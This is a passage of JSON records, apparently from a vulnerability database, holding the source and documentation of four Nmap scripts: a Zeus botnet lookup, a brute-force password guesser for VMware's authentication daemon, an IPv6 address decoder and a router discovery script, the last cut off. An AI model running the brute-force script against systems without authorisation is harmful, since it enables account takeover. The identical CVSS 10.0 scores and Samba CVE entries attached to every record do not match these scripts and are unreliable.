"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2011-10-31T18:11:54", "type": "nmap", "title": "dns-zeustracker NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-10-18T01:08:19", "id": "NMAP:DNS-ZEUSTRACKER.NSE", "href": "https://nmap.org/nsedoc/scripts/dns-zeustracker.html", "sourceData": "local dns = require \"dns\"\nlocal ipOps = require \"ipOps\"\nlocal 
stdnse = require \"stdnse\"\nlocal stringaux = require \"stringaux\"\nlocal tab = require \"tab\"\nlocal table = require \"table\"\n\ndescription = [[\nChecks if the target IP range is part of a Zeus botnet by querying ZTDNS @ abuse.ch.\nPlease review the following information before you start to scan:\n* https://zeustracker.abuse.ch/ztdns.php\n]]\n\n---\n-- @usage\n-- nmap -sn -PN --script=dns-zeustracker <ip>\n-- @output\n-- Host script results:\n-- | dns-zeustracker:\n-- | Name IP SBL ASN Country Status Level Files Online Date added\n-- | foo.example.com 1.2.3.4 SBL123456 1234 CN online Bulletproof hosted 0 2011-06-17\n-- |_ bar.example.com 1.2.3.5 SBL123456 1234 CN online Bulletproof hosted 0 2011-06-15\n\nauthor = \"Mikael Keri\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"safe\", \"discovery\", \"external\", \"malware\"}\n\n\n\nhostrule = function(host) return not(ipOps.isPrivate(host.ip)) end\n\naction = function(host)\n\n local levels = {\n \"Bulletproof hosted\",\n \"Hacked webserver\",\n \"Free hosting service\",\n \"Unknown\",\n \"Hosted on a FastFlux botnet\"\n }\n local dname = dns.reverse(host.ip)\n dname = dname:gsub (\"%.in%-addr%.arpa\",\".ipbl.zeustracker.abuse.ch\")\n local status, result = dns.query(dname, {dtype='TXT', retAll=true} )\n\n if ( not(status) and result == \"No Such Name\" ) then\n return\n elseif ( not(status) ) then\n return stdnse.format_output(false, \"DNS Query failed\")\n end\n\n local output = tab.new(9)\n tab.addrow(output, \"Name\", \"IP\", \"SBL\", \"ASN\", \"Country\", \"Status\", \"Level\",\n \"Files Online\", \"Date added\")\n for _, record in ipairs(result) do\n local name, ip, sbl, asn, country, status, level, files_online,\n dateadded = table.unpack(stringaux.strsplit(\"| \", record))\n level = levels[tonumber(level)] or \"Unknown\"\n tab.addrow(output, name, ip, sbl, asn, country, status, level, files_online, dateadded)\n end\n return stdnse.format_output(true, 
tab.dump(output))\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:32:56", "description": "Performs brute force password auditing against the VMWare Authentication Daemon (vmware-authd).\n\n## Script Arguments \n\n#### passdb, unpwdb.passlimit, unpwdb.timelimit, unpwdb.userlimit, userdb \n\nSee the documentation for the [unpwdb](<../lib/unpwdb.html#script-args>) library. \n\n#### creds.[service], creds.global \n\nSee the documentation for the [creds](<../lib/creds.html#script-args>) library. \n\n#### brute.credfile, brute.delay, brute.emptypass, brute.firstonly, brute.guesses, brute.mode, brute.passonly, brute.retries, brute.start, brute.threads, brute.unique, brute.useraspass \n\nSee the documentation for the [brute](<../lib/brute.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -p 902 <ip> --script vmauthd-brute\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 902/tcp open iss-realsecure\n | vmauthd-brute:\n | Accounts\n | root:00000 - Valid credentials\n | Statistics\n |_ Performed 183 guesses in 40 seconds, average tps: 4\n \n\n## Requires \n\n * [brute](<../lib/brute.html>)\n * [creds](<../lib/creds.html>)\n * [match](<../lib/match.html>)\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-01-02T11:12:46", "type": "nmap", "title": "vmauthd-brute NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, 
"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-03-10T03:09:39", "id": "NMAP:VMAUTHD-BRUTE.NSE", "href": "https://nmap.org/nsedoc/scripts/vmauthd-brute.html", "sourceData": "local brute = require \"brute\"\nlocal creds = require \"creds\"\nlocal match = require \"match\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\n\ndescription = [[\nPerforms brute force password auditing against the VMWare Authentication Daemon (vmware-authd).\n]]\n\n---\n-- @usage\n-- nmap -p 902 <ip> --script vmauthd-brute\n--\n-- @output\n-- PORT STATE SERVICE\n-- 902/tcp open iss-realsecure\n-- | vmauthd-brute:\n-- | Accounts\n-- | root:00000 - Valid credentials\n-- | Statistics\n-- |_ Performed 183 guesses in 40 seconds, average tps: 4\n--\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"brute\", \"intrusive\"}\n\n\nportrule = shortport.port_or_service(902, {\"ssl/vmware-auth\", \"vmware-auth\"}, \"tcp\")\n\nlocal function fail(err) return stdnse.format_output(false, err) end\nDriver = {\n\n new = function(self, host, port, options)\n local o = { host = host, port = port }\n setmetatable(o, self)\n self.__index = self\n return o\n end,\n\n connect = function(self)\n self.socket = brute.new_socket()\n return self.socket:connect(self.host, self.port)\n end,\n\n login = function(self, username, password)\n local status, line = self.socket:receive_buf(match.pattern_limit(\"\\r\\n\", 2048), false)\n if ( line:match(\"^220 VMware Authentication Daemon.*SSL 
Required\") ) then\n self.socket:reconnect_ssl()\n end\n\n status = self.socket:send( (\"USER %s\\r\\n\"):format(username) )\n if ( not(status) ) then\n local err = brute.Error:new( \"Failed to send data to server\" )\n err:setRetry( true )\n return false, err\n end\n\n local status, response = self.socket:receive_buf(match.pattern_limit(\"\\r\\n\", 2048), false)\n if ( not(status) or not(response:match(\"^331\") ) ) then\n local err = brute.Error:new( \"Received unexpected response from server\" )\n err:setRetry( true )\n return false, err\n end\n\n status = self.socket:send( (\"PASS %s\\r\\n\"):format(password) )\n if ( not(status) ) then\n local err = brute.Error:new( \"Failed to send data to server\" )\n err:setRetry( true )\n return false, err\n end\n status, response = self.socket:receive_buf(match.pattern_limit(\"\\r\\n\", 2048), false)\n\n if ( response:match(\"^230\") ) then\n return true, creds.Account:new(username, password, creds.State.VALID)\n end\n\n return false, brute.Error:new( \"Login incorrect\" )\n end,\n\n disconnect = function(self)\n return self.socket:close()\n end\n\n}\n\nlocal function checkAuthd(host, port)\n local socket = nmap.new_socket()\n local status = socket:connect(host, port)\n\n if( not(status) ) then\n return false, \"Failed to connect to server\"\n end\n\n local status, line = socket:receive_buf(match.pattern_limit(\"\\r\\n\", 2048), false)\n socket:close()\n if ( not(status) ) then\n return false, \"Failed to receive response from server\"\n end\n\n if ( not( line:match(\"^220 VMware Authentication Daemon\") ) ) then\n return false, \"Failed to detect VMWare Authentication Daemon\"\n end\n return true\nend\n\n\naction = function(host, port)\n local status, err = checkAuthd(host, port)\n if ( not(status) ) then\n return fail(err)\n end\n\n local engine = brute.Engine:new(Driver, host, port)\n engine.options.script_name = SCRIPT_NAME\n local result\n status, result = engine:start()\n return result\nend\n", "cvss": {"score": 
10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:47:45", "description": "Shows extra information about IPv6 addresses, such as embedded MAC or IPv4 addresses when available. \n\nSome IP address formats encode extra information; for example some IPv6 addresses encode an IPv4 address or MAC address. This script can decode these address formats: \n\n * IPv4-compatible IPv6 addresses, \n * IPv4-mapped IPv6 addresses, \n * Teredo IPv6 addresses, \n * 6to4 IPv6 addresses, \n * IPv6 addresses using an EUI-64 interface ID, \n * IPv4-embedded IPv6 addresses, \n * IPv4-translated IPv6 addresses and \n * ISATAP Modified EUI-64 IPv6 addresses. \n\nSee RFC 4291 for general IPv6 addressing architecture and the definitions of some terms.\n\n## Example Usage \n \n \n nmap -sV -sC <target>\n\n## Script Output \n \n \n Nmap scan report for ::1.2.3.4\n Host script results:\n | address-info:\n | IPv4-compatible:\n |_ IPv4 address: 1.2.3.4\n \n Nmap scan report for ::ffff:1.2.3.4\n Host script results:\n | address-info:\n | IPv4-mapped:\n |_ IPv4 address: 1.2.3.4\n \n Nmap scan report for 2001:0:506:708:282a:3d75:fefd:fcfb\n Host script results:\n | address-info:\n | Teredo:\n | Server IPv4 address: 5.6.7.8\n | Client IPv4 address: 1.2.3.4\n |_ UDP port: 49802\n \n Nmap scan report for 2002:102:304::1\n Host script results:\n | address-info:\n | 6to4:\n |_ IPv4 address: 1.2.3.4\n \n Nmap scan report for fe80::a8bb:ccff:fedd:eeff\n Host script results:\n | address-info:\n | IPv6 EUI-64:\n | MAC address:\n | address: aa:bb:cc:dd:ee:ff\n |_ manuf: Unknown\n \n Nmap scan report for 64:ff9b::c000:221\n Host script results:\n | address-info:\n | IPv4-embedded IPv6 address:\n |_ IPv4 address: 192.0.2.33\n \n Nmap scan report for ::ffff:0:c0a8:101\n Host script results:\n | address-info:\n | IPv4-translated IPv6 address:\n |_ IPv4 address: 192.168.1.1\n\n## Requires \n\n * [datafiles](<../lib/datafiles.html>)\n * [nmap](<../lib/nmap.html>)\n * 
[stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2011-08-23T10:36:16", "type": "nmap", "title": "address-info NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2021-04-07T18:42:28", "id": "NMAP:ADDRESS-INFO.NSE", "href": "https://nmap.org/nsedoc/scripts/address-info.html", "sourceData": "local datafiles = require \"datafiles\"\nlocal nmap = require \"nmap\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\n\ndescription = [[\nShows extra information about IPv6 addresses, such as embedded MAC or IPv4 addresses when available.\n\nSome IP address formats encode extra information; for example some IPv6\naddresses encode an IPv4 address or MAC address. 
This script can decode\nthese address formats:\n* IPv4-compatible IPv6 addresses,\n* IPv4-mapped IPv6 addresses,\n* Teredo IPv6 addresses,\n* 6to4 IPv6 addresses,\n* IPv6 addresses using an EUI-64 interface ID,\n* IPv4-embedded IPv6 addresses,\n* IPv4-translated IPv6 addresses and\n* ISATAP Modified EUI-64 IPv6 addresses.\n\nSee RFC 4291 for general IPv6 addressing architecture and the\ndefinitions of some terms.\n]]\n\n---\n-- @output\n-- Nmap scan report for ::1.2.3.4\n-- Host script results:\n-- | address-info:\n-- | IPv4-compatible:\n-- |_ IPv4 address: 1.2.3.4\n--\n-- Nmap scan report for ::ffff:1.2.3.4\n-- Host script results:\n-- | address-info:\n-- | IPv4-mapped:\n-- |_ IPv4 address: 1.2.3.4\n--\n-- Nmap scan report for 2001:0:506:708:282a:3d75:fefd:fcfb\n-- Host script results:\n-- | address-info:\n-- | Teredo:\n-- | Server IPv4 address: 5.6.7.8\n-- | Client IPv4 address: 1.2.3.4\n-- |_ UDP port: 49802\n--\n-- Nmap scan report for 2002:102:304::1\n-- Host script results:\n-- | address-info:\n-- | 6to4:\n-- |_ IPv4 address: 1.2.3.4\n--\n-- Nmap scan report for fe80::a8bb:ccff:fedd:eeff\n-- Host script results:\n-- | address-info:\n-- | IPv6 EUI-64:\n-- | MAC address:\n-- | address: aa:bb:cc:dd:ee:ff\n-- |_ manuf: Unknown\n--\n-- Nmap scan report for 64:ff9b::c000:221\n-- Host script results:\n-- | address-info:\n-- | IPv4-embedded IPv6 address:\n-- |_ IPv4 address: 192.0.2.33\n--\n-- Nmap scan report for ::ffff:0:c0a8:101\n-- Host script results:\n-- | address-info:\n-- | IPv4-translated IPv6 address:\n-- |_ IPv4 address: 192.168.1.1\n\n-- * ISATAP. 
RFC 5214.\n-- XXXX:XXXX:XXXX:XX00:0000:5EFE:a.b.c.d\n\n---\n--@xmloutput\n-- <table key=\"IPv4-mapped\">\n-- <elem key=\"IPv4 address\">1.2.3.4</elem>\n-- </table>\n--\n-- <table key=\"IPv4-compatible\">\n-- <elem key=\"IPv4 address\">1.2.3.4</elem>\n-- </table>\n--\n-- <table key=\"Teredo\">\n-- <elem key=\"Server IPv4 address\">5.6.7.8</elem>\n-- <elem key=\"Client IPv4 address\">1.2.3.4</elem>\n-- <elem key=\"UDP port\">49802</elem>\n-- </table>\n--\n-- <table key=\"6to4\">\n-- <elem key=\"IPv4 address\">1.2.3.4</elem>\n-- </table>\n--\n-- <table key=\"IPv6 EUI-64\">\n-- <table key=\"MAC address\">\n-- <elem key=\"address\">aa:bb:cc:dd:ee:ff</elem>\n-- <elem key=\"manuf\">Unknown</elem>\n-- </table>\n-- </table>\n--\n-- <table key=\"IPv4-embedded IPv6 address\">\n-- <elem key=\"IPv4 address\">192.0.2.33</elem>\n-- </table>\n--\n-- <table key=\"IPv4-translated IPv6 address\">\n-- <elem key=\"IPv4 address\">192.168.1.1</elem>\n-- </table>\n\nauthor = \"David Fifield\"\n\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\ncategories = {\"default\", \"safe\"}\n\n\nhostrule = function(host)\n return true\nend\n\n-- Match an address (array of bytes) against a hex-encoded pattern. 
\"XX\" in the\n-- pattern is a wildcard.\nlocal function matches(addr, pattern)\n local octet_patterns\n\n octet_patterns = {}\n for op in pattern:gmatch(\"([%xX][%xX])\") do\n octet_patterns[#octet_patterns + 1] = op\n end\n\n if #addr ~= #octet_patterns then\n return false\n end\n\n for i = 1, #addr do\n local a, op\n\n a = addr[i]\n op = octet_patterns[i]\n if not (op == \"XX\" or a == tonumber(op, 16)) then\n return false\n end\n end\n\n return true\nend\n\nlocal function get_manuf(mac)\n local catch = function() return \"Unknown\" end\n local try = nmap.new_try(catch)\n local mac_prefixes = try(datafiles.parse_mac_prefixes())\n local prefix = string.upper(string.format(\"%02x%02x%02x\", mac[1], mac[2], mac[3]))\n return mac_prefixes[prefix] or \"Unknown\"\nend\n\nlocal function format_mac(mac)\n local out = stdnse.output_table()\n out.address = stdnse.format_mac(string.char(table.unpack(mac)))\n out.manuf = get_manuf(mac)\n return out\nend\n\nlocal function format_ipv4(ipv4)\n local octets\n\n octets = {}\n for _, v in ipairs(ipv4) do\n octets[#octets + 1] = string.format(\"%d\", v)\n end\n\n return table.concat(octets, \".\")\nend\n\nlocal function do_ipv4(addr)\n -- intentionally empty\nend\n\n-- EUI-64 from MAC, RFC 4291.\nlocal function decode_eui_64(eui_64)\n if eui_64[4] == 0xff and eui_64[5] == 0xfe then\n return { (eui_64[1] ~ 0x02),\n eui_64[2], eui_64[3], eui_64[6], eui_64[7], eui_64[8] }\n end\nend\n\nlocal function do_ipv6(addr)\n local label\n local output\n\n output = stdnse.output_table()\n\n if matches(addr, \"0000:0000:0000:0000:0000:0000:0000:0001\") then\n -- ::1 is localhost. 
Not much to report.\n return nil\n elseif matches(addr, \"0000:0000:0000:0000:0000:0000:XXXX:XXXX\") then\n -- RFC 4291 2.5.5.1.\n local ipv4 = { addr[13], addr[14], addr[15], addr[16] }\n return {[\"IPv4-compatible\"]= { [\"IPv4 address\"] = format_ipv4(ipv4) } }\n elseif matches(addr, \"0000:0000:0000:0000:0000:ffff:XXXX:XXXX\") then\n -- RFC 4291 2.5.5.2.\n local ipv4 = { addr[13], addr[14], addr[15], addr[16] }\n return {[\"IPv4-mapped\"]= { [\"IPv4 address\"] = format_ipv4(ipv4) } }\n elseif matches(addr, \"2001:0000:XXXX:XXXX:XXXX:XXXX:XXXX:XXXX\") then\n -- Teredo, RFC 4380.\n local server_ipv4 = { addr[5], addr[6], addr[7], addr[8] }\n -- RFC 5991 makes the flags mostly meaningless.\n local flags = addr[9] * 256 + addr[10]\n local obs_port = addr[11] * 256 + addr[12]\n local obs_client_ipv4 = { addr[13], addr[14], addr[15], addr[16] }\n local port, client_ipv4\n\n -- Invert obs_port.\n port = obs_port ~ 0xffff\n\n -- Invert obs_client_ipv4.\n client_ipv4 = {}\n for _, octet in ipairs(obs_client_ipv4) do\n client_ipv4[#client_ipv4 + 1] = octet ~ 0xff\n end\n\n output[\"Server IPv4 address\"] = format_ipv4(server_ipv4)\n output[\"Client IPv4 address\"] = format_ipv4(client_ipv4)\n output[\"UDP port\"] = tostring(port)\n\n return {[\"Teredo\"] = output}\n elseif matches(addr, \"0064:ff9b:XXXX:XXXX:00XX:XXXX:XXXX:XXXX\") then\n --IPv4-embedded IPv6 addresses. 
RFC 6052, Section 2\n\n --skip addr[9]\n if matches(addr,\"0064:ff9b:0000:0000:0000:0000:XXXX:XXXX\") then\n local ipv4 = {addr[13], addr[14], addr[15], addr[16]}\n return {[\"IPv4-embedded IPv6 address\"]= {[\"IPv4 address\"] = format_ipv4(ipv4)}}\n elseif addr[5] ~= 0x01 then\n local ipv4 = {addr[5], addr[6], addr[7], addr[8]}\n return {[\"IPv4-embedded IPv6 address\"]= {[\"IPv4 address\"] = format_ipv4(ipv4)}}\n elseif addr[6] ~= 0x22 then\n local ipv4 = {addr[6], addr[7], addr[8], addr[10]}\n return {[\"IPv4-embedded IPv6 address\"]= {[\"IPv4 address\"] = format_ipv4(ipv4)}}\n elseif addr[7] ~= 0x03 then\n local ipv4 = {addr[7], addr[8], addr[10], addr[11]}\n return {[\"IPv4-embedded IPv6 address\"]= {[\"IPv4 address\"] = format_ipv4(ipv4)}}\n elseif addr[8] ~= 0x44 then\n local ipv4 = {addr[8], addr[10], addr[11], addr[12]}\n return {[\"IPv4-embedded IPv6 address\"]= {[\"IPv4 address\"] = format_ipv4(ipv4)}}\n elseif addr[10] == 0x00 and addr[11] == 0x00 and addr[12] == 0x00 then\n local ipv4 = {addr[13], addr[14], addr[15], addr[16]}\n return {[\"IPv4-embedded IPv6 address\"]= {[\"IPv4 address\"] = format_ipv4(ipv4)}}\n end\n elseif matches(addr, \"0000:0000:0000:0000:ffff:0000:XXXX:XXXX\") then\n -- IPv4-translated IPv6 addresses. RFC 2765, Section 2.1\n return {[\"IPv4-translated IPv6 address\"]=\n {[\"IPv4 address\"] = format_ipv4( {addr[13], addr[14], addr[15], addr[16]})}}\n elseif matches(addr, \"XXXX:XXXX:XXXX:XX00:0000:5efe:XXXX:XXXX\") then\n -- ISATAP. 
RFC 5214, Appendix A\n -- XXXX:XXXX:XXXX:XX00:0000:5EFE:a.b.c.d\n return {[\"ISATAP Modified EUI-64 IPv6 Address\"]=\n {[\"IPv4 address\"] = format_ipv4( {addr[13], addr[14], addr[15], addr[16]})}}\n end\n\n -- These following use common handling for the Interface ID part\n -- (last 64 bits).\n\n if matches(addr, \"2002:XXXX:XXXX:XXXX:XXXX:XXXX:XXXX:XXXX\") then\n -- 6to4, RFC 3056.\n local ipv4 = { addr[3], addr[4], addr[5], addr[6] }\n\n label = \"6to4\"\n output[\"IPv4 address\"] = format_ipv4(ipv4)\n end\n\n local mac = decode_eui_64({ addr[9], addr[10], addr[11], addr[12],\n addr[13], addr[14], addr[15], addr[16] })\n if mac then\n output[\"MAC address\"] = format_mac(mac)\n if not label then\n label = \"IPv6 EUI-64\"\n end\n end\n\n if label then\n return {[label]= output}\n end\n -- else no match\nend\n\naction = function(host)\n local addr_s, addr_t\n\n addr_s = host.bin_ip\n addr_t = { string.byte(addr_s, 1, #addr_s) }\n\n if #addr_t == 4 then\n return do_ipv4(addr_t)\n elseif #addr_t == 16 then\n return do_ipv6(addr_t)\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:44:49", "description": "Retrieve hardware details and configuration information utilizing HNAP, the \"Home Network Administration Protocol\". It is an HTTP-Simple Object Access Protocol (SOAP)-based protocol which allows for remote topology discovery, configuration, and management of devices (routers, cameras, PCs, NAS, etc.)\n\n## Script Arguments \n\n#### slaxml.debug \n\nSee the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the [http](<../lib/http.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. 
\n\n## Example Usage \n \n \n nmap --script hnap-info -p80,8080 <target>\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 8080/tcp open http-proxy syn-ack\n | hnap-info:\n | Type: GatewayWithWiFi\n | Device: Ingraham\n | Vendor: Linksys\n | Description: Linksys E1200\n | Model: E1200\n | Firmware: 1.0.00 build 11\n | Presentation URL: http://192.168.1.1/\n | SOAPACTIONS:\n | http://purenetworks.com/HNAP1/IsDeviceReady\n | http://purenetworks.com/HNAP1/GetDeviceSettings\n | http://purenetworks.com/HNAP1/SetDeviceSettings\n | http://purenetworks.com/HNAP1/GetDeviceSettings2\n | http://purenetworks.com/HNAP1/SetDeviceSettings2\n \n \n\n## Requires \n\n * [http](<../lib/http.html>)\n * [table](<>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [slaxml](<../lib/slaxml.html>)\n * [nmap](<../lib/nmap.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-06-14T05:55:46", "type": "nmap", "title": "hnap-info NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2017-07-27T18:21:09", "id": "NMAP:HNAP-INFO.NSE", 
"href": "https://nmap.org/nsedoc/scripts/hnap-info.html", "sourceData": "local http = require \"http\"\nlocal table = require \"table\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal slaxml = require \"slaxml\"\nlocal nmap = require \"nmap\"\n\ndescription = [[\nRetrieve hardwares details and configuration information utilizing HNAP, the \"Home Network Administration Protocol\".\nIt is an HTTP-Simple Object Access Protocol (SOAP)-based protocol which allows for remote topology discovery,\nconfiguration, and management of devices (routers, cameras, PCs, NAS, etc.)]]\n\n---\n-- @usage\n-- nmap --script hnap-info -p80,8080 <target>\n--\n-- @output\n-- PORT STATE SERVICE REASON\n-- 8080/tcp open http-proxy syn-ack\n-- | hnap-info:\n-- | Type: GatewayWithWiFi\n-- | Device: Ingraham\n-- | Vendor: Linksys\n-- | Description: Linksys E1200\n-- | Model: E1200\n-- | Firmware: 1.0.00 build 11\n-- | Presentation URL: http://192.168.1.1/\n-- | SOAPACTIONS:\n-- | http://purenetworks.com/HNAP1/IsDeviceReady\n-- | http://purenetworks.com/HNAP1/GetDeviceSettings\n-- | http://purenetworks.com/HNAP1/SetDeviceSettings\n-- | http://purenetworks.com/HNAP1/GetDeviceSettings2\n-- | http://purenetworks.com/HNAP1/SetDeviceSettings2\n--\n--\n-- @xmloutput\n-- <elem key=\"Type\">GatewayWithWiFi</elem>\n-- <elem key=\"Device\">Ingraham</elem>\n-- <elem key=\"Vendor\">Linksys</elem>\n-- <elem key=\"Description\">Linksys E1200</elem>\n-- <elem key=\"Model\">E1200</elem>\n-- <elem key=\"Firmware\">1.0.00 build 11</elem>\n-- <elem key=\"Presentation URL\">http://192.168.1.1/</elem>\n-- <table key=\"SOAPACTIONS\">\n-- <elem>http://purenetworks.com/HNAP1/IsDeviceReady</elem>\n-- <elem>http://purenetworks.com/HNAP1/GetDeviceSettings</elem>\n-- <elem>http://purenetworks.com/HNAP1/SetDeviceSettings</elem>\n-- <elem>http://purenetworks.com/HNAP1/GetDeviceSettings2</elem>\n-- <elem>http://purenetworks.com/HNAP1/SetDeviceSettings2</elem>\n-- 
</table>\n-----------------------------------------------------------------------\n\nauthor = \"Gyanendra Mishra\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\n \"safe\",\n \"discovery\",\n \"default\",\n \"version\"\n}\n\n\nportrule = function(host, port)\n return (shortport.http(host,port) and nmap.version_intensity() >= 7)\nend\n\nlocal ELEMENTS = {[\"Type\"] = \"Type\",\n[\"DeviceName\"] = \"Device\",\n[\"VendorName\"] = \"Vendor\",\n[\"ModelDescription\"] = \"Description\",\n[\"ModelName\"] = \"Model\",\n[\"FirmwareVersion\"] = \"Firmware\",\n[\"PresentationURL\"] = \"Presentation URL\",\n[\"string\"] = \"SOAPACTIONS\",\n[\"SubDeviceURLs\"] = \"Sub Device URLs\"}\n\nfunction get_text_callback(store, name)\n if ELEMENTS[name] == nil then return end\n name = ELEMENTS[name]\n if name == 'SOAPACTIONS' or name == 'Sub Device URLs' or name == 'Type' then\n return function(content)\n store[name] = store[name] or {}\n table.insert(store[name], content)\n end\n else\n return function(content)\n store[name] = content\n end\n end\nend\n\nfunction action (host, port)\n\n -- Identify servers that answer 200 to invalid HTTP requests and exit as these would invalidate the tests\n local status_404, result_404, _ = http.identify_404(host,port)\n if ( status_404 and result_404 == 200 ) then\n stdnse.debug1(\"Exiting due to ambiguous response from web server on %s:%s. 
All URIs return status 200.\", host.ip, port.number)\n return nil\n end\n\n local output = stdnse.output_table()\n local response = http.get(host, port, '/HNAP1')\n if response.status and response.status == 200 then\n local parser = slaxml.parser:new()\n parser._call = {startElement = function(name)\n parser._call.text = get_text_callback(output, name) end,\n closeElement = function(name) parser._call.text = function() return nil end end\n }\n parser:parseSAX(response.body, {stripWhitespace=true})\n\n -- exit if the parser does not return output\n if not next(output) then return nil end\n\n -- set the port verson\n port.version.name = \"hnap\"\n port.version.name_confidence = 10\n port.version.product = output[\"Description\"] or nil\n port.version.version = output[\"Model\"] or nil\n port.version.devicetype = output[\"Type\"] and output[\"Type\"][1] or nil\n port.version.cpe = port.version.cpe or {}\n\n if output[\"Vendor\"] and output[\"Model\"] then\n table.insert(port.version.cpe, \"cpe:/h:\".. output[\"Vendor\"]:lower() .. \":\" .. 
